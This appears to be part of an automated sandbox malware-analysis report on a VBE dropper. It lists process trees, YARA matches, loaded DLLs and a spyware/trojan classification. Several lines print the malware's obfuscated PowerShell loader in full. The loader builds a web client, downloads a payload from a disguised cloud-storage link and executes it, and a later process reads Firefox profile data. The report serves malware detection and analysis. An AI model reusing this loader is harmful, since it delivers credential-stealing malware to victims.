IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_046B85F013_2_046B85F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_046B8EC013_2_046B8EC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_046B82A813_2_046B82A8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_22C9396015_2_22C93960
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_22C9497815_2_22C94978
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_22C9961E15_2_22C9961E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_22C9C85015_2_22C9C850
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_22C93CA815_2_22C93CA8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_232CAD2815_2_232CAD28
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_232C8B1815_2_232C8B18
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_232C7BB115_2_232C7BB1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_232C004015_2_232C0040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_232C3C0015_2_232C3C00
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E1C5C16_2_007E1C5C
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E25D316_2_007E25D3
            Source: amsi32_6840.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@14/8@3/3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Belleric74.AfsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_03
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:304:WilStaging_02
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmx2r0kx.r2f.ps1Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCommand line argument: WABOpen16_2_007E1C5C
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCommand line argument: 5~16_2_007E3530
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2680
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6840
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
